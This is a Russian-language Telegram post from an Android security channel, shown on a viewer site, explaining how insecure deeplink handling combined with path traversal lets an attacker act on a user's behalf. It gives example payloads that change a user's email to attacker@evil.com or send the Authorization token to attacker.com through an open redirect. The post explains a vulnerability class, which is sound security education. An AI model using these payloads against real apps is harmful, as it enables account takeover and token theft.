TGViewer
Android Guards Android Guards @android_guards_today · 3.86K subscribers
Post #217 2.57K
В мобильных приложениях тоже встречаются CSRF. И не только в WebView. Небезопасная обработка диплинков вместе с path traversal вполне может привести к выполнению "полезных" действий от имени пользователя. А в некоторых случаях, и привести у захвату пользовательского аккаунта.

Немного утрированный пример: есть диплинк вида myapp://payment/new/{card_num}, после перехода по которому, приложение выполняет запрос POST https://server.com/api/payments_by_card/{card_num}. Указав вместо номера карты полезную нагрузку вида ../users/email?new=attacker@evil.com можно изменить email пользователя.

Более реальный пример: переход по диплинку myapp://orders/{id} приводит к вызову метода GET https://server.com/api/orders/{id}. Если на этом же сервере у нас есть open redirect, то можно составить такую полезную нагрузку: ../auth?redirect_uri=attacker.com и в логах сервера злоумышленника окажется токен, который цепляется к запросу в заголовке Authorization.
#aht
  • 👍 30
  • 🔥 2
  • ❤ 1
More from @android_guards_today
  1. Aug 25, 2026Сегодня исполнилось 35 лет ядру Linux. Ну "исполнилось и исполнилось, чего бухтеть то?", к…
  2. Jul 29, 2026Написал небольшую заметку про один не слишком очевидный способ выполнения кода до фактичес…
  3. Jun 8, 2026Собрал тут себе игрушку для решения разных интересных задач. Может и вам пригодится 🌚 Дем…
  4. May 30, 2026Идёт шумная деревенская свадьба. Под утро пьяный вдрызг тамада, громко спрашивает: — Кто е…
  5. May 25, 2026В дополнение к предыдущему посту. Если вы получаете инвайт от бота и видите, ошибку, что с…
  6. May 24, 2026Вот и настал момент перевернуть еще одну страницу в жизни этого замечательного сообщества.…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →